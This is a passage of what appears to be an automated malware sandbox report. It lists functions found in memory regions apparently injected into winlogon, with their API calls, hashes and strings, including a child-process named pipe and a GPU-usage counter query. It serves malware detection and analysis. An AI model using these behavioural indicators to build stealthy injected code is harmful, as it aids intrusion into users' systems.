Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 5c16f09041be8b645f9990b675969fbfe91f0a43291d9b19f9330004a6e2f389
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 1C31A233A44B4986F712DF22A444B9A73A0FBC8F99F844024DE4A57724DE39D446C3C2

Function 000001CA7D2134B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001CA7D213516
GetProcessHeap.KERNEL32 ref: 000001CA7D213527
HeapAlloc.KERNEL32 ref: 000001CA7D213535
PdhGetCounterInfoW.PDH ref: 000001CA7D21354B
StrCmpW.SHLWAPI ref: 000001CA7D213560

Part of subcall function 000001CA7D213950: StrCmpNW.SHLWAPI ref: 000001CA7D213972
Part of subcall function 000001CA7D213950: StrStrW.SHLWAPI ref: 000001CA7D213990
Part of subcall function 000001CA7D213950: StrToIntW.SHLWAPI ref: 000001CA7D2139B7

GetProcessHeap.KERNEL32 ref: 000001CA7D21358D
HeapFree.KERNEL32 ref: 000001CA7D21359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001CA7D213559

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 01238701deea32749901f043c41a85233535f38141b80a811341c7053083115b
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 9D31B433A44B4996F712DF12A444B9973A1BF88F98F858129DE4A43724DF3AE44782C3

Function 000001CA7D1E34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001CA7D1E3516
GetProcessHeap.KERNEL32 ref: 000001CA7D1E3527
HeapAlloc.KERNEL32 ref: 000001CA7D1E3535
PdhGetCounterInfoW.PDH ref: 000001CA7D1E354B
StrCmpW.SHLWAPI ref: 000001CA7D1E3560

Part of subcall function 000001CA7D1E3950: StrCmpNW.SHLWAPI ref: 000001CA7D1E3972
Part of subcall function 000001CA7D1E3950: StrStrW.SHLWAPI ref: 000001CA7D1E3990
Part of subcall function 000001CA7D1E3950: StrToIntW.SHLWAPI ref: 000001CA7D1E39B7

GetProcessHeap.KERNEL32 ref: 000001CA7D1E358D
HeapFree.KERNEL32 ref: 000001CA7D1E359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001CA7D1E3559

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 8eab24d6d6144954bd2ca5cd0d15ee39b50dab67e5137aa515f9043b1a9d6d94
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 07318433A50B4986F712DF12E854B9973E1BF84F9AF8440259E4A43724DF39D542C782

Function 000001CA7D1B962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001CA7D1B9689

Part of subcall function 000001CA7D1BA544: __GetUnwindTryBlock.LIBCMT ref: 000001CA7D1BA587
Part of subcall function 000001CA7D1BA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001CA7D1BA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001CA7D1B9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001CA7D1B99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001CA7D1B9ABC

Strings

csm, xrefs: 000001CA7D1B9784
csm, xrefs: 000001CA7D1B970A
csm, xrefs: 000001CA7D1B96A3

Memory Dump Source

Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: db454895896c66f2aae9d4fb35f949d79ab27abdbeef052a67be09c4d4be01c7
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: E8D17C33A44B488AFB629F65D480BED77A0FB45B8CF900115EA8D57B96DB35C082C783

Function 000001CA7D29A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001CA7D29A289

Part of subcall function 000001CA7D29B144: __GetUnwindTryBlock.LIBCMT ref: 000001CA7D29B187
Part of subcall function 000001CA7D29B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001CA7D29B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001CA7D29A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001CA7D29A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001CA7D29A6BC

Strings

csm, xrefs: 000001CA7D29A2A3
csm, xrefs: 000001CA7D29A30A
csm, xrefs: 000001CA7D29A384

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: e25051ce7f45a5f54960e9841c87e8732a799f56ae8f5b22f7c45591229d7051
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: CCD1CE33A447888AFB62CF2495407DD37A4FB4979DF901105EA8967B99CB35C482C7C3

Function 000001CA7D21A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001CA7D21A289

Part of subcall function 000001CA7D21B144: __GetUnwindTryBlock.LIBCMT ref: 000001CA7D21B187
Part of subcall function 000001CA7D21B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001CA7D21B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001CA7D21A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001CA7D21A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001CA7D21A6BC

Strings

csm, xrefs: 000001CA7D21A2A3
csm, xrefs: 000001CA7D21A384
csm, xrefs: 000001CA7D21A30A

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 93558ce561f458a496548046fa9771a477e4b847544d87466bd0439cd31ff69d
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: B2D1AC33A447888AFB62CB659540BDD77A0FB4578CF908119EA8957B96CB36C482C7C3

Function 000001CA7D1EA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001CA7D1EA289

Part of subcall function 000001CA7D1EB144: __GetUnwindTryBlock.LIBCMT ref: 000001CA7D1EB187
Part of subcall function 000001CA7D1EB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001CA7D1EB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001CA7D1EA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001CA7D1EA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001CA7D1EA6BC

Strings

csm, xrefs: 000001CA7D1EA384
csm, xrefs: 000001CA7D1EA2A3
csm, xrefs: 000001CA7D1EA30A

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 9fc1314c1b3568874932ff714da4d78103fade56a62ede063e1102c62ff8e334
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: E8D18B73A447888AFB22DF659540BDD7BA0FB4979DF900205EE8957B96CB35C480C783

Function 000001CA7D29104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D2910B1
RegEnumValueW.ADVAPI32 ref: 000001CA7D291117
GetProcessHeap.KERNEL32 ref: 000001CA7D29115A
HeapAlloc.KERNEL32 ref: 000001CA7D291168
GetProcessHeap.KERNEL32 ref: 000001CA7D291185
HeapFree.KERNEL32 ref: 000001CA7D291193

Strings

d, xrefs: 000001CA7D2910D6

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 2003d48ef077ee33f5376efef2558062a00fd4140dc90c64e07b1c00940d858d
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 6541B133614B84DAF761CF22E44479E77A1F788B89F808119DA890B758DF3DC44ACB92

Function 000001CA7D21104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D2110B1
RegEnumValueW.ADVAPI32 ref: 000001CA7D211117
GetProcessHeap.KERNEL32 ref: 000001CA7D21115A
HeapAlloc.KERNEL32 ref: 000001CA7D211168
GetProcessHeap.KERNEL32 ref: 000001CA7D211185
HeapFree.KERNEL32 ref: 000001CA7D211193

Strings

d, xrefs: 000001CA7D2110D6

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 8a4b5a10e027ae3e9ee44e0ca111a6274b15f8be53a4c776a450907aef51b4fb
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 9A41A133614B88C6F761CF21E44479EB7A1F788B98F848119EA8907758DF3ED446CB92

Function 000001CA7D1E104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D1E10B1
RegEnumValueW.ADVAPI32 ref: 000001CA7D1E1117
GetProcessHeap.KERNEL32 ref: 000001CA7D1E115A
HeapAlloc.KERNEL32 ref: 000001CA7D1E1168
GetProcessHeap.KERNEL32 ref: 000001CA7D1E1185
HeapFree.KERNEL32 ref: 000001CA7D1E1193

Strings

d, xrefs: 000001CA7D1E10D6

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 6f63e4c53f789b41bcef94283b1f03cc38c3850ef35568dd7831dedf23a81aa2
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 9A41D073614B84CAF761CF21E404B9E77A1F788B89F808129DA8947758DF39C585CB82

Function 000001CA7D292518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001CA7D29252D
GetCurrentProcessId.KERNEL32 ref: 000001CA7D292537
CreateFileW.KERNEL32 ref: 000001CA7D292568
WriteFile.KERNEL32 ref: 000001CA7D292590
ReadFile.KERNEL32 ref: 000001CA7D2925AF
CloseHandle.KERNEL32 ref: 000001CA7D2925B8

Strings

\\.\pipe\$nya-childproc, xrefs: 000001CA7D292549

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: b17e47fd4f1449c8d4acc04e3621050a468f068c5ba762e4a054dfaa74389b3f
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: BA116D32A18B5482F7118B21F41479B7760FB88BA8F944215EA5906AA8DF3DC146CBC2

Function 000001CA7D212518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001CA7D21252D
GetCurrentProcessId.KERNEL32 ref: 000001CA7D212537
CreateFileW.KERNEL32 ref: 000001CA7D212568
WriteFile.KERNEL32 ref: 000001CA7D212590
ReadFile.KERNEL32 ref: 000001CA7D2125AF
CloseHandle.KERNEL32 ref: 000001CA7D2125B8

Strings

\\.\pipe\$nya-childproc, xrefs: 000001CA7D212549

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 4ae2b1dd0165a769ae8a6f1806b14cc66bc568eb7fc37f487b2a6e2550b0d5b4
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 6D117F32A18B4482F7118B21F854B997760FB88BD8FD44314EA5906AA8CF3DC146CBC6

Function 000001CA7D1E2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001CA7D1E252D
GetCurrentProcessId.KERNEL32 ref: 000001CA7D1E2537
CreateFileW.KERNEL32 ref: 000001CA7D1E2568
WriteFile.KERNEL32 ref: 000001CA7D1E2590
ReadFile.KERNEL32 ref: 000001CA7D1E25AF
CloseHandle.KERNEL32 ref: 000001CA7D1E25B8

Strings

\\.\pipe\$nya-childproc, xrefs: 000001CA7D1E2549

Memory Dump Source

Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$nya-childproc
API String ID: 166002920-3933612297
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 60ccf5d49717dcd0a93c838fa48479b51da98688de155bc44fd090f9c66e7f12
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 0E117C32A15B4482F7118B21F464B9A7760FB88BD8F940314EA5942AA8DF3DC145CB86

Function 000001CA7D1B7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001CA7D1B7078
__scrt_acquire_startup_lock.LIBCMT ref: 000001CA7D1B70CA
_RTC_Initialize.LIBCMT ref: 000001CA7D1B70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001CA7D1B711E
__scrt_release_startup_lock.LIBCMT ref: 000001CA7D1B7149

Memory Dump Source

Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 24616cbd0e12550494a136588df692ffe9cf0816aba21efa28764c3b263d334b
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 8881CF73F8434C46FA53AB6D9841BD93291BF8678CFD45025998C47396DA3BC882C783

Function 000001CA7D297C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001CA7D297C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001CA7D297CCA
_RTC_Initialize.LIBCMT ref: 000001CA7D297CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001CA7D297D1E
__scrt_release_startup_lock.LIBCMT ref: 000001CA7D297D49

Memory Dump Source

Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true

Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: c017a9effcea72d85198735e9016d59a6dfb2979d59511daea1fd325c26afa1d
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: BF81D373E8034846FA53AB659441FD97290BF8578EFC840259A8877396DB3BC84787C3

Function 000001CA7D217C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001CA7D217C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001CA7D217CCA
_RTC_Initialize.LIBCMT ref: 000001CA7D217CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001CA7D217D1E
__scrt_release_startup_lock.LIBCMT ref: 000001CA7D217D49

Memory Dump Source

Source File: 00000008.00000002.2759806116.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000008.00000002.2758420906.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2761214602.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2762353885.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2763542025.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2764537381.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca7d210000_winlogon.jbxd

Similarity

